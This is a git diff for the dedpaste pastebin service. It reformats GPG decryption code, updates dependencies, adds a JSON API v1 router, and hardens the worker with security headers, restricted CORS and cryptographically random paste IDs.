@@ -1302,20 +1456,25 @@ async function decryptWithGpgKeyring(encryptedContent: string): Promise<GpgDecry
     } catch (writeError: any) {
       return {
         success: false,
-        error: `Failed to create temporary file: ${writeError.message}`
+        error: `Failed to create temporary file: ${writeError.message}`,
       };
     }
-    
+
     // First check if the message can be decrypted (without actually decrypting)
-    console.log('Checking if GPG can decrypt the message...');
-    const listResult = await execFilePromise('gpg', ['--list-only', '--batch', tempFilePath]);
-    
+    console.log("Checking if GPG can decrypt the message...");
+    const listResult = await execFilePromise("gpg", [
+      "--list-only",
+      "--batch",
+      tempFilePath,
+    ]);
+
     let keyIds: Array<{ type: string; id: string }> = [];
-    
+
     // Capture key IDs if available
     if (listResult.stderr) {
       // Look for "encrypted with" lines (GPG outputs this info to stderr)
-      const encryptedWithRegex = /encrypted with\s+(\w+)\s+key,\s+ID\s+([A-F0-9]+)/gi;
+      const encryptedWithRegex =
+        /encrypted with\s+(\w+)\s+key,\s+ID\s+([A-F0-9]+)/gi;
       let match;
       while ((match = encryptedWithRegex.exec(listResult.stderr)) !== null) {
         const keyType = match[1];
@@ -1323,53 +1482,67 @@ async function decryptWithGpgKeyring(encryptedContent: string): Promise<GpgDecry
         keyIds.push({ type: keyType, id: keyId });
       }
     }
-    
+
     if (keyIds.length > 0) {
-      console.log(`Message encrypted for keys: ${keyIds.map(k => k.id).join(', ')}`);
+      console.log(
+        `Message encrypted for keys: ${keyIds.map((k) => k.id).join(", ")}`,
+      );
     }
-    
+
     // Try to decrypt the message with a timeout
-    console.log('Attempting to decrypt with GPG...');
-    
+    console.log("Attempting to decrypt with GPG...");
+
     // Set a timeout for the GPG process (30 seconds)
     const decryptOptions: ExecFileOptions = {
-      timeout: 30000,  // 30 seconds
-      env: { ...process.env, LANG: 'C' } // Use C locale for consistent output format
+      timeout: 30000, // 30 seconds
+      env: { ...process.env, LANG: "C" }, // Use C locale for consistent output format
     };
-    
+
     const decryptResult = await execFilePromise(
-      'gpg', 
-      ['--decrypt', '--batch', '--yes', tempFilePath],
-      decryptOptions
+      "gpg",
+      ["--decrypt", "--batch", "--yes", tempFilePath],
+      decryptOptions,
     );
-    
+
     // Always clean up the temporary file - use try/finally to ensure cleanup
     try {
       fs.unlinkSync(tempFilePath);
-      console.log('Removed temporary file');
+      console.log("Removed temporary file");
     } catch (cleanupError: any) {
       console.error(`Failed to remove temporary file: ${cleanupError.message}`);
       // In a production environment, we might want to schedule another cleanup attempt
     }
-    
+
     if (decryptResult.error) {
       console.log(`GPG decryption failed: ${decryptResult.error.message}`);
-      
+
       // Perform detailed error analysis
-      let errorDetails = '';
-      
+      let errorDetails = "";
+
       if (decryptResult.stderr) {
         // Common GPG error patterns
         const errorPatterns = [
-          { pattern: /secret key not available/i, message: 'No matching private key found in GPG keyring' },
-          { pattern: /decryption failed: No secret key/i, message: 'No matching private key found in GPG keyring' },
-          { pattern: /failed to start/i, message: 'Failed to start GPG process' },
-          { pattern: /bad passphrase/i, message: 'Bad passphrase for GPG key' },
-          { pattern: /operation cancelled/i, message: 'Operation cancelled by GPG' },
-          { pattern: /invalid armor/i, message: 'Invalid PGP message format' },
-          { pattern: /timeout/i, message: 'GPG operation timed out' }
+          {
+            pattern: /secret key not available/i,
+            message: "No matching private key found in GPG keyring",
+          },
+          {
+            pattern: /decryption failed: No secret key/i,
+            message: "No matching private key found in GPG keyring",
+          },
+          {
+            pattern: /failed to start/i,
+            message: "Failed to start GPG process",
+          },
+          { pattern: /bad passphrase/i, message: "Bad passphrase for GPG key" },
+          {
+            pattern: /operation cancelled/i,
+            message: "Operation cancelled by GPG",
+          },
+          { pattern: /invalid armor/i, message: "Invalid PGP message format" },
+          { pattern: /timeout/i, message: "GPG operation timed out" },
         ];
-        
+
         // Check for specific error patterns
         for (const { pattern, message } of errorPatterns) {
           if (pattern.test(decryptResult.stderr)) {
@@ -1377,54 +1550,57 @@ async function decryptWithGpgKeyring(encryptedContent: string): Promise<GpgDecry
             break;
           }
         }
-        
+
         // If no specific pattern matched, use the first line of stderr
         if (!errorDetails) {
-          errorDetails = decryptResult.stderr.split('\n')[0].trim();
+          errorDetails = decryptResult.stderr.split("\n")[0].trim();
         }
       }
-      
+
       return {
         success: false,
         keyIds: keyIds.length > 0 ? keyIds : undefined,
         error: errorDetails || decryptResult.error.message,
-        rawError: decryptResult.stderr // Include raw error for debugging
+        rawError: decryptResult.stderr, // Include raw error for debugging
       };
     }
-    
+
     // Success - we have decrypted content
-    console.log('Successfully decrypted with GPG keyring');
-    
+    console.log("Successfully decrypted with GPG keyring");
+
     // Extract any additional info from stderr (GPG prints informational messages there)
-    let decryptionKeyId = '';
+    let decryptionKeyId = "";
     let recipientInfo: string | null = null;
-    
+
     if (decryptResult.stderr) {
       // Extract key ID used for decryption
-      const keyIdMatch = decryptResult.stderr.match(/encrypted with.*ID ([A-F0-9]+)/i);
+      const keyIdMatch = decryptResult.stderr.match(
+        /encrypted with.*ID ([A-F0-9]+)/i,
+      );
       if (keyIdMatch && keyIdMatch[1]) {
         decryptionKeyId = keyIdMatch[1];
       }
-      
+
       // Look for recipient information (for better diagnostics)
-      const recipientMatch = decryptResult.stderr.match(/encrypted for: "([^"]+)"/);
+      const recipientMatch = decryptResult.stderr.match(
+        /encrypted for: "([^"]+)"/,
+      );
       if (recipientMatch && recipientMatch[1]) {
         recipientInfo = recipientMatch[1];
       }
     }
-    
+
     return {
       success: true,
       data: Buffer.from(decryptResult.stdout),
       keyId: decryptionKeyId,
-      recipient: recipientInfo
+      recipient: recipientInfo,
     };
-    
   } catch (error: any) {
     console.error(`Error in GPG keyring decryption: ${error.message}`);
     return {
       success: false,
-      error: `GPG keyring access error: ${error.message}`
+      error: `GPG keyring access error: ${error.message}`,
     };
   }
 }
@@ -1441,5 +1617,5 @@ export {
   createPgpEncryptedMessage,
   decryptPgpMessage,
   validatePgpKey,
-  decryptWithGpgKeyring
+  decryptWithGpgKeyring,
 };

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "dedpaste",
-  "version": "1.22.0",
+  "version": "1.23.2",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "dedpaste",
-      "version": "1.22.0",
+      "version": "1.23.2",
       "hasInstallScript": true,
       "license": "ISC",
       "dependencies": {
@@ -46,7 +46,7 @@
         "wrangler": "^4.60.0"
       },
       "engines": {
-        "node": ">=14"
+        "node": ">=18"
       }
     },
     "node_modules/@ampproject/remapping": {
@@ -104,6 +104,7 @@
       "integrity": "sha512-lWBYIrF7qK5+GjY5Uy+/hEgp8OJWOD/rpy74GplYRhEauvbHDeFB8t5hPOZxCZ0Oxf4Cc36tK51/l3ymJysrKw==",
       "dev": true,
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "@ampproject/remapping": "^2.2.0",
         "@babel/code-frame": "^7.26.2",
@@ -705,7 +706,8 @@
       "resolved": "https://registry.npmjs.org/@cloudflare/workers-types/-/workers-types-4.20260123.0.tgz",
       "integrity": "sha512-pQccZ8IDLFKkvdKBXZRPkbMtWtS7vVz1giJGkAAZ5cZH2RHK5Bs6p1OoVZA8Z2Sry8Q0tZbZ5Yjud4R7SrG3KQ==",
       "dev": true,
-      "license": "MIT OR Apache-2.0"
+      "license": "MIT OR Apache-2.0",
+      "peer": true
     },
     "node_modules/@cspotcode/source-map-support": {
       "version": "0.8.1",
@@ -796,6 +798,7 @@
       "version": "11.14.0",
       "resolved": "https://registry.npmjs.org/@emotion/react/-/react-11.14.0.tgz",
       "integrity": "sha512-O000MLDBDdk/EohJPFUqvnp4qnHeYkVP5B0xEG0D/L7cOKP9kefu2DXn8dj74cQfsEzUqh+sr1RzFqiL1o+PpA==",
+      "peer": true,
       "dependencies": {
         "@babel/runtime": "^7.18.3",
         "@emotion/babel-plugin": "^11.13.5",
@@ -855,6 +858,7 @@
       "version": "11.14.1",
       "resolved": "https://registry.npmjs.org/@emotion/styled/-/styled-11.14.1.tgz",
       "integrity": "sha512-qEEJt42DuToa3gurlH4Qqc1kVpNq8wO8cJtDzU46TjlzWjDlsVyevtYCRijVq3SrHsROS+gVQ8Fnea108GnKzw==",
+      "peer": true,
       "dependencies": {
         "@babel/runtime": "^7.18.3",
         "@emotion/babel-plugin": "^11.13.5",
@@ -3509,6 +3513,7 @@
       "integrity": "sha512-I6LPUvlRH+O6VRUqYOcMudhaIdUVWfsjnZavnsraHvpBwaEyMN29ry+0UVJhImYL16xsscu0aske3yA+uPOWfw==",
       "devOptional": true,
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "undici-types": "~6.20.0"
       }
@@ -3886,6 +3891,7 @@
         }
       ],
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "caniuse-lite": "^1.0.30001688",
         "electron-to-chromium": "^1.5.73",
@@ -4692,6 +4698,7 @@
       "resolved": "https://registry.npmjs.org/eslint/-/eslint-9.34.0.tgz",
       "integrity": "sha512-RNCHRX5EwdrESy3Jc9o8ie8Bog+PeYvvSR8sDGoZxNFTvZ4dlxUB3WzQ3bQMztFrSRODGrLLj8g6OFuGY/aiQg==",
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "@eslint-community/eslint-utils": "^4.2.0",
         "@eslint-community/regexpp": "^4.12.1",
@@ -7499,8 +7506,7 @@
     "node_modules/scheduler": {
       "version": "0.26.0",
       "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.26.0.tgz",
-      "integrity": "sha512-NlHwttCI/l5gCPR3D1nNXtWABUmBwvZpEQiD4IXSbIDq8BzLIK/7Ir5gTFSGZDUu37K5cMNp0hFtzO38sC7gWA==",
-      "peer": true
+      "integrity": "sha512-NlHwttCI/l5gCPR3D1nNXtWABUmBwvZpEQiD4IXSbIDq8BzLIK/7Ir5gTFSGZDUu37K5cMNp0hFtzO38sC7gWA=="
     },
     "node_modules/semver": {
       "version": "7.7.3",
@@ -8029,6 +8035,7 @@
       "integrity": "sha512-i7qRCmY42zmCwnYlh9H2SvLEypEFGye5iRmEMKjcGi7zk9UquigRjFtTLz0TYqr0ZGLZhaMHl/foy1bZR+Cwlw==",
       "dev": true,
       "license": "MIT",
+      "peer": true,
       "dependencies": {
         "pathe": "^2.0.3"
       }
@@ -8168,6 +8175,7 @@
       "dev": true,
       "hasInstallScript": true,
       "license": "Apache-2.0",
+      "peer": true,
       "bin": {
         "workerd": "bin/workerd"
       },

--- a/package.json
+++ b/package.json
@@ -43,7 +43,7 @@
   },
   "homepage": "https://github.com/anoncam/dedpaste#readme",
   "engines": {
-    "node": ">=14"
+    "node": ">=18"
   },
   "devDependencies": {
     "@cloudflare/workers-types": "^4.20250303.0",

--- a/src/api/v1/index.ts
+++ b/src/api/v1/index.ts
@@ -1,0 +1,5 @@
+/**
+ * API v1 Module - Central export for API v1 routes.
+ */
+
+export { routeApiV1 } from "./router";

--- a/src/api/v1/router.ts
+++ b/src/api/v1/router.ts
@@ -1,0 +1,294 @@
+/**
+ * API v1 Router
+ *
+ * Handles all /api/v1/ prefixed routes with structured JSON responses,
+ * proper HTTP status codes, and validation.
+ */
+
+import type { ServiceContainer } from "../../services";
+import type { WorkerAnalytics } from "../../analytics";
+import {
+  validateApiV1CreatePaste,
+  checkValidation,
+  parseJsonBody,
+  successResponse,
+  errorResponse,
+  notFoundResponse,
+  internalErrorResponse,
+} from "../../validation";
+
+/** Cloudflare Workers environment bindings */
+interface Env {
+  PASTE_BUCKET: R2Bucket;
+  PASTE_METADATA?: KVNamespace;
+  UPLOAD_SESSIONS?: KVNamespace;
+}
+
+/** API version info */
+const API_VERSION = "v1";
+const API_PREFIX = `/api/${API_VERSION}`;
+
+/**
+ * Route an API v1 request to the appropriate handler.
+ * Returns null if the path does not match any API v1 route.
+ */
+export async function routeApiV1(
+  request: Request,
+  _env: Env,
+  services: ServiceContainer,
+  analytics: WorkerAnalytics | null,
+): Promise<Response | null> {
+  const url = new URL(request.url);
+  const path = url.pathname;
+
+  // Only handle /api/v1/ routes
+  if (!path.startsWith(API_PREFIX)) {
+    return null;
+  }
+
+  const subPath = path.slice(API_PREFIX.length);
+
+  // Handle CORS preflight
+  if (request.method === "OPTIONS") {
+    return new Response(null, {
+      headers: {
+        "Access-Control-Allow-Origin": "*",
+        "Access-Control-Allow-Methods": "GET, POST, DELETE, OPTIONS",
+        "Access-Control-Allow-Headers": "Content-Type, Authorization",
+        "Access-Control-Max-Age": "86400",
+      },
+    });
+  }
+
+  // Route table
+  try {
+    // Health check
+    if (subPath === "/health" && request.method === "GET") {
+      return handleHealth();
+    }
+
+    // Paste CRUD
+    if (subPath === "/paste" && request.method === "POST") {
+      return await handleCreatePaste(request, services, analytics);
+    }
+
+    // Get paste by ID
+    const pasteMatch = subPath.match(/^\/paste\/([a-zA-Z0-9]{8})$/);
+    if (pasteMatch && request.method === "GET") {
+      return await handleGetPaste(pasteMatch[1], false, services);
+    }
+
+    // Get encrypted paste by ID
+    const encPasteMatch = subPath.match(/^\/paste\/e\/([a-zA-Z0-9]{8})$/);
+    if (encPasteMatch && request.method === "GET") {
+      return await handleGetPaste(encPasteMatch[1], true, services);
+    }
+
+    // Delete paste
+    const deleteMatch = subPath.match(/^\/paste\/([a-zA-Z0-9]{8})$/);
+    if (deleteMatch && request.method === "DELETE") {
+      return await handleDeletePaste(deleteMatch[1], services);
+    }
+
+    // Paste info (metadata only)
+    const infoMatch = subPath.match(/^\/paste\/([a-zA-Z0-9]{8})\/info$/);
+    if (infoMatch && request.method === "GET") {
+      return await handlePasteInfo(infoMatch[1], services);
+    }
+
+    return notFoundResponse(`No API route matches ${request.method} ${subPath}`);
+  } catch (error) {
+    console.error(`[API v1] Error handling ${request.method} ${subPath}:`, error);
+    return internalErrorResponse(
+      "An unexpected error occurred while processing your request",
+    );
+  }
+}
+
+// ============================================
+// Route Handlers
+// ============================================
+
+/**
+ * GET /api/v1/health
+ * Health check endpoint that verifies service availability.
+ */
+function handleHealth(): Response {
+  return successResponse({
+    status: "healthy",
+    version: API_VERSION,
+    timestamp: new Date().toISOString(),
+    services: {
+      storage: "available",
+      encryption: "available",
+    },
+  });
+}
+
+/**
+ * POST /api/v1/paste
+ * Create a new paste with full validation and structured response.
+ */
+async function handleCreatePaste(
+  request: Request,
+  services: ServiceContainer,
+  analytics: WorkerAnalytics | null,
+): Promise<Response> {
+  // Parse and validate the request body
+  const parsed = await parseJsonBody(request);
+  if ("error" in parsed) {
+    return parsed.error;
+  }
+
+  const validation = validateApiV1CreatePaste(parsed.data);
+  const validationError = checkValidation(validation);
+  if (validationError) {
+    return validationError;
+  }
+
+  const input = validation.data!;
+  const baseUrl = new URL(request.url).origin;
+
+  try {
+    const result = await services.paste.createPaste(
+      input.content,
+      {
+        isEncrypted: input.isEncrypted || false,
+        isOneTime: input.isOneTime || false,
+        contentType: input.contentType || "text/plain",
+        filename: input.filename,
+        expireDuration: input.expireDuration,
+        burnAfterReads: input.burnAfterReads,
+      },
+      baseUrl,
+    );
+
+    // Track paste creation
+    if (analytics) {
+      await analytics.trackPasteCreated(request, {
+        is_encrypted: input.isEncrypted || false,
+        is_one_time: input.isOneTime || false,
+        content_type: input.contentType || "text/plain",
+        size_bytes: new TextEncoder().encode(input.content).length,
+      });
+    }
+
+    return successResponse(
+      {
+        id: result.id,
+        url: result.url,
+        isEncrypted: result.isEncrypted,
+        isBurnAfterReading: result.isBurnAfterReading,
+        ...(result.expiresAt
+          ? { expiresAt: new Date(result.expiresAt).toISOString() }
+          : {}),
+        ...(result.remainingReads !== undefined
+          ? { remainingReads: result.remainingReads }
+          : {}),
+      },
+      201,
+    );
+  } catch (error) {
+    console.error("[API v1] Error creating paste:", error);
+    return internalErrorResponse("Failed to create paste");
+  }
+}
+
+/**
+ * GET /api/v1/paste/:id or GET /api/v1/paste/e/:id
+ * Retrieve a paste by ID with structured response.
+ */
+async function handleGetPaste(
+  id: string,
+  isEncrypted: boolean,
+  services: ServiceContainer,
+): Promise<Response> {
+  try {
+    const result = await services.paste.getPaste(id, isEncrypted);
+
+    if (!result) {
+      return notFoundResponse("Paste not found or has expired");
+    }
+
+    // For API responses, return JSON with content
+    const content = await result.arrayBuffer();
+    const textContent = new TextDecoder().decode(content);
+
+    return successResponse({
+      id,
+      content: textContent,
+      contentType: result.contentType,
+      filename: result.filename || null,
+      size: result.size,
+      isOneTime: result.isOneTime,
+      isEncrypted: result.isEncrypted,
+      createdAt: new Date(result.createdAt).toISOString(),
+      ...(result.expiresAt
+        ? { expiresAt: new Date(result.expiresAt).toISOString() }
+        : {}),
+      ...(result.remainingReads !== undefined
+        ? { remainingReads: result.remainingReads }
+        : {}),
+    });
+  } catch (error) {
+    console.error(`[API v1] Error retrieving paste ${id}:`, error);
+    return internalErrorResponse("Failed to retrieve paste");
+  }
+}
+
+/**
+ * DELETE /api/v1/paste/:id
+ * Delete a paste by ID.
+ */
+async function handleDeletePaste(
+  id: string,
+  services: ServiceContainer,
+): Promise<Response> {
+  try {
+    await services.paste.deletePaste(id);
+
+    return successResponse({
+      id,
+      deleted: true,
+    });
+  } catch (error) {
+    console.error(`[API v1] Error deleting paste ${id}:`, error);
+    return internalErrorResponse("Failed to delete paste");
+  }
+}
+
+/**
+ * GET /api/v1/paste/:id/info
+ * Get paste metadata without consuming a burn-after-reading read.
+ * This is a lightweight endpoint for checking paste existence and metadata.
+ */
+async function handlePasteInfo(
+  id: string,
+  services: ServiceContainer,
+): Promise<Response> {
+  try {
+    // Use the storage service directly for a metadata-only check
+    const metadata = await services.storage.getMetadata(`reads:${id}`);
+
+    // Basic info response
+    const info: Record<string, unknown> = {
+      id,
+      exists: true,
+    };
+
+    if (metadata) {
+      const data = JSON.parse(metadata) as {
+        remaining: number;
+        max: number;
+      };
+      info.burnAfterReading = true;
+      info.remainingReads = data.remaining;
+      info.maxReads = data.max;
+    }
+
+    return successResponse(info);
+  } catch (error) {
+    console.error(`[API v1] Error getting paste info ${id}:`, error);
+    return internalErrorResponse("Failed to get paste info");
+  }
+}

--- a/src/index.ts
+++ b/src/index.ts
@@ -58,6 +58,20 @@ import type {
 } from "./types";
 import { LARGE_FILE_CONSTANTS } from "./types";
 
+// Import service layer
+import { createServices, parseDuration } from "./services";
+
+// Import validation
+import {
+  validateTextUpload,
+  validateWebUpload,
+  checkValidation,
+  parseJsonBody,
+} from "./validation";
+
+// Import API v1 router
+import { routeApiV1 } from "./api/v1";
+
 // Define the environment interface for Cloudflare Workers
 type Env = {
   PASTE_BUCKET: R2Bucket;
@@ -70,22 +84,83 @@ type PasteMetadata = {
   isOneTime: boolean;
   createdAt: number;
   filename?: string; // Optional filename for detecting markdown files
-  // We don't need to store encryption info in metadata
-  // since the server doesn't need to know if content is encrypted
-  // The URL path (/e/) is sufficient to indicate encryption
+  /** Expiration timestamp in ms since epoch */
+  expiresAt?: number;
+  /** Remaining reads for burn-after-reading */
+  remainingReads?: number;
+  /** Total reads for burn-after-reading */
+  maxReads?: number;
 };
 
 // For one-time pastes, we'll use a completely different key format
 // with a prefix to make identifying them clear
 const ONE_TIME_PREFIX = "onetime-";
 
-// Generate a random ID for the paste
-function generateId(length = 8): string {
+// Maximum upload size for standard (non-multipart) uploads: 25MB
+const MAX_STANDARD_UPLOAD_SIZE = 25 * 1024 * 1024;
+
+// Allowed CORS origin (restrict from wildcard)
+const ALLOWED_ORIGIN = "https://paste.d3d.dev";
+
+/** Security headers applied to all responses */
+const SECURITY_HEADERS: Record<string, string> = {
+  "X-Content-Type-Options": "nosniff",
+  "X-Frame-Options": "DENY",
+  "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
+  "Referrer-Policy": "no-referrer",
+  "Permissions-Policy": "camera=(), microphone=(), geolocation=()",
+  "X-XSS-Protection": "1; mode=block",
+};
+
+/** Get CORS origin header based on request origin */
+function getCorsOrigin(request?: Request): string {
+  if (!request) return ALLOWED_ORIGIN;
+  const origin = request.headers.get("Origin") || "";
+  // Allow the primary domain and localhost for development
+  if (
+    origin === ALLOWED_ORIGIN ||
+    origin.startsWith("http://localhost:") ||
+    origin.startsWith("http://127.0.0.1:")
+  ) {
+    return origin;
+  }
+  return ALLOWED_ORIGIN;
+}
+
+/** Apply security headers to a Response */
+function withSecurityHeaders(response: Response, request?: Request): Response {
+  const newHeaders = new Headers(response.headers);
+  for (const [key, value] of Object.entries(SECURITY_HEADERS)) {
+    newHeaders.set(key, value);
+  }
+  // Set CSP for HTML responses
+  const contentType = newHeaders.get("Content-Type") || "";
+  if (contentType.includes("text/html")) {
+    newHeaders.set(
+      "Content-Security-Policy",
+      "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; font-src https://fonts.gstatic.com; img-src 'self' data:; connect-src 'self';",
+    );
+  }
+  // Restrict CORS
+  if (newHeaders.has("Access-Control-Allow-Origin")) {
+    newHeaders.set("Access-Control-Allow-Origin", getCorsOrigin(request));
+  }
+  return new Response(response.body, {
+    status: response.status,
+    statusText: response.statusText,
+    headers: newHeaders,
+  });
+}
+
+// Generate a cryptographically secure random ID for the paste
+function generateId(length = 16): string {
   const chars =
     "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+  const randomValues = new Uint32Array(length);
+  crypto.getRandomValues(randomValues);
   let result = "";
   for (let i = 0; i < length; i++) {
-    result += chars.charAt(Math.floor(Math.random() * chars.length));
+    result += chars.charAt(randomValues[i] % chars.length);
   }
   return result;
 }
@@ -123,170 +198,208 @@ export default {
     env: Env,
     ctx: ExecutionContext,
   ): Promise<Response> {
-    // Initialize analytics
-    const analytics = createAnalytics(env);
+    const response = await handleRequest(request, env, ctx);
+    return withSecurityHeaders(response, request);
+  },
+};
 
-    // Initialize viewedPastes from KV store if available (completely optional enhancement)
-    try {
-      if (env.PASTE_METADATA) {
-        const storedViewedPastes =
-          await env.PASTE_METADATA.get(VIEWED_PASTES_KEY);
-        if (storedViewedPastes) {
-          const parsedPastes = safeJsonParse<ViewedPasteTracker>(
-            storedViewedPastes,
-            {},
-          );
-          // Merge with any in-memory pastes (newer ones take precedence)
-          Object.assign(viewedPastes, parsedPastes);
-        }
+async function handleRequest(
+  request: Request,
+  env: Env,
+  ctx: ExecutionContext,
+): Promise<Response> {
+  // Initialize analytics
+  const analytics = createAnalytics(env);
+
+  // Initialize the service layer
+  const services = createServices(env);
+  await services.storage.initialize();
+
+  // Initialize viewedPastes from KV store if available (completely optional enhancement)
+  try {
+    if (env.PASTE_METADATA) {
+      const storedViewedPastes =
+        await env.PASTE_METADATA.get(VIEWED_PASTES_KEY);
+      if (storedViewedPastes) {
+        const parsedPastes = safeJsonParse<ViewedPasteTracker>(
+          storedViewedPastes,
+          {},
+        );
+        // Merge with any in-memory pastes (newer ones take precedence)
+        Object.assign(viewedPastes, parsedPastes);
       }
-    } catch (error) {
-      // Log but continue without error - KV is an enhancement, not a requirement
-      console.log("[KV] Optional paste metadata storage not available:", error);
     }
-    const url = new URL(request.url);
-    const path = url.pathname;
+  } catch (error) {
+    // Log but continue without error - KV is an enhancement, not a requirement
+    console.log("[KV] Optional paste metadata storage not available:", error);
+  }
+  const url = new URL(request.url);
+  const path = url.pathname;
 
-    // Handle OPTIONS requests for CORS
-    if (request.method === "OPTIONS") {
-      return new Response(null, {
+  // Handle OPTIONS requests for CORS
+  if (request.method === "OPTIONS") {
+    return new Response(null, {
+      headers: {
+        "Access-Control-Allow-Origin": getCorsOrigin(request),
+        "Access-Control-Allow-Methods": "GET, POST, PUT, OPTIONS",
+        "Access-Control-Allow-Headers":
+          "Content-Type, X-Filename, X-Content-Type, X-One-Time, X-Expire, X-Burn-Reads, Authorization",
+      },
+    });
+  }
+
+  // ============================================
+  // API v1 Routes - Structured JSON API
+  // ============================================
+  const apiV1Response = await routeApiV1(request, env, services, analytics);
+  if (apiV1Response) {
+    return apiV1Response;
+  }
+
+  // Upload a new paste
+  if (request.method === "POST") {
+    // Handle API uploads for web interface
+    if (path === "/api/upload") {
+      return await handleWebUpload(request, env);
+    }
+
+    if (path === "/api/text") {
+      return await handleTextUpload(request, env);
+    }
+
+    // Handle regular uploads
+    if (path === "/upload" || path === "/temp") {
+      const isOneTime = path === "/temp";
+      return await handleUpload(request, env, isOneTime, false, analytics);
+    }
+
+    // Handle encrypted uploads
+    if (path === "/e/upload" || path === "/e/temp") {
+      const isOneTime = path === "/e/temp";
+      return await handleUpload(request, env, isOneTime, true, analytics);
+    }
+
+    // ============================================
+    // Multipart Upload Endpoints (Large Files)
+    // ============================================
+
+    // Initialize multipart upload
+    if (path === "/upload/init" || path === "/e/upload/init") {
+      const isEncrypted = path.startsWith("/e/");
+      return await handleMultipartInit(request, env, isEncrypted);
+    }
+
+    // Complete multipart upload
+    const completeMatch = path.match(
+      /^(\/e)?\/upload\/([a-zA-Z0-9_-]+)\/complete$/,
+    );
+    if (completeMatch) {
+      const isEncrypted = !!completeMatch[1];
+      const sessionId = completeMatch[2];
+      return await handleMultipartComplete(
+        request,
+        env,
+        sessionId,
+        isEncrypted,
+      );
+    }
+
+    // Abort multipart upload
+    const abortMatch = path.match(/^(\/e)?\/upload\/([a-zA-Z0-9_-]+)\/abort$/);
+    if (abortMatch) {
+      const sessionId = abortMatch[2];
+      return await handleMultipartAbort(request, env, sessionId);
+    }
+
+    return new Response("Not found", { status: 404 });
+  }
+
+  // Handle PUT requests for multipart upload parts
+  if (request.method === "PUT") {
+    const partMatch = path.match(
+      /^(\/e)?\/upload\/([a-zA-Z0-9_-]+)\/part\/(\d+)$/,
+    );
+    if (partMatch) {
+      const isEncrypted = !!partMatch[1];
+      const sessionId = partMatch[2];
+      const partNumber = parseInt(partMatch[3], 10);
+      return await handleMultipartPartUpload(
+        request,
+        env,
+        sessionId,
+        partNumber,
+      );
+    }
+
+    return new Response("Not found", { status: 404 });
+  }
+
+  // Get a paste
+  if (request.method === "GET") {
+    // Handle multipart upload status (for resume)
+    const statusMatch = path.match(
+      /^(\/e)?\/upload\/([a-zA-Z0-9_-]+)\/status$/,
+    );
+    if (statusMatch) {
+      const sessionId = statusMatch[2];
+      return await handleMultipartStatus(env, sessionId);
+    }
+
+    // Handle API decryption for web interface
+    const decryptMatch = path.match(/^\/api\/decrypt\/([a-zA-Z0-9]{8,24})$/);
+    if (decryptMatch) {
+      const id = decryptMatch[1];
+      return await handleWebDecrypt(id, env, ctx, request);
+    }
+
+    // Handle regular pastes with optional filename
+    const regularMatch = path.match(/^\/([a-zA-Z0-9]{8,24})(?:\/(.+))?$/);
+    if (regularMatch) {
+      const id = regularMatch[1];
+      const urlFilename = regularMatch[2] || null;
+      return await handleGet(id, env, ctx, false, request, urlFilename);
+    }
+
+    // Handle encrypted pastes with optional filename
+    const encryptedMatch = path.match(/^\/e\/([a-zA-Z0-9]{8,24})(?:\/(.+))?$/);
+    if (encryptedMatch) {
+      const id = encryptedMatch[1];
+      const urlFilename = encryptedMatch[2] || null;
+      return await handleGet(id, env, ctx, true, request, urlFilename);
+    }
+
+    // Try to serve styles.css directly if [site] configuration doesn't work
+    if (path === "/styles.css") {
+      // Serve MUI CSS instead of Tailwind
+      const cssContent = getMuiCSS();
+
+      console.log("Serving MUI CSS file");
+      return new Response(cssContent, {
         headers: {
-          "Access-Control-Allow-Origin": "*",
-          "Access-Control-Allow-Methods": "GET, POST, OPTIONS",
-          "Access-Control-Allow-Headers": "Content-Type",
+          "Content-Type": "text/css",
+          "Cache-Control": "public, max-age=86400",
         },
       });
     }
 
-    // Upload a new paste
-    if (request.method === "POST") {
-      // Handle API uploads for web interface
-      if (path === "/api/upload") {
-        return await handleWebUpload(request, env);
-      }
+    // Serve the HTML homepage
+    if (path === "/") {
+      // Track homepage view
+      await analytics.trackHomepageView(request);
 
-      if (path === "/api/text") {
-        return await handleTextUpload(request, env);
-      }
-
-      // Handle regular uploads
-      if (path === "/upload" || path === "/temp") {
-        const isOneTime = path === "/temp";
-        return await handleUpload(request, env, isOneTime, false, analytics);
-      }
-
-      // Handle encrypted uploads
-      if (path === "/e/upload" || path === "/e/temp") {
-        const isOneTime = path === "/e/temp";
-        return await handleUpload(request, env, isOneTime, true, analytics);
-      }
-
-      // ============================================
-      // Multipart Upload Endpoints (Large Files)
-      // ============================================
-
-      // Initialize multipart upload
-      if (path === "/upload/init" || path === "/e/upload/init") {
-        const isEncrypted = path.startsWith("/e/");
-        return await handleMultipartInit(request, env, isEncrypted);
-      }
-
-      // Complete multipart upload
-      const completeMatch = path.match(/^(\/e)?\/upload\/([a-zA-Z0-9_-]+)\/complete$/);
-      if (completeMatch) {
-        const isEncrypted = !!completeMatch[1];
-        const sessionId = completeMatch[2];
-        return await handleMultipartComplete(request, env, sessionId, isEncrypted);
-      }
-
-      // Abort multipart upload
-      const abortMatch = path.match(/^(\/e)?\/upload\/([a-zA-Z0-9_-]+)\/abort$/);
-      if (abortMatch) {
-        const sessionId = abortMatch[2];
-        return await handleMultipartAbort(request, env, sessionId);
-      }
-
-      return new Response("Not found", { status: 404 });
+      return new Response(generateHomepage(url.origin), {
+        headers: {
+          "Content-Type": "text/html",
+          "Access-Control-Allow-Origin": "*",
+        },
+      });
     }
 
-    // Handle PUT requests for multipart upload parts
-    if (request.method === "PUT") {
-      const partMatch = path.match(/^(\/e)?\/upload\/([a-zA-Z0-9_-]+)\/part\/(\d+)$/);
-      if (partMatch) {
-        const isEncrypted = !!partMatch[1];
-        const sessionId = partMatch[2];
-        const partNumber = parseInt(partMatch[3], 10);
-        return await handleMultipartPartUpload(request, env, sessionId, partNumber);
-      }
+    return new Response("Not found", { status: 404 });
+  }
 
-      return new Response("Not found", { status: 404 });
-    }
-
-    // Get a paste
-    if (request.method === "GET") {
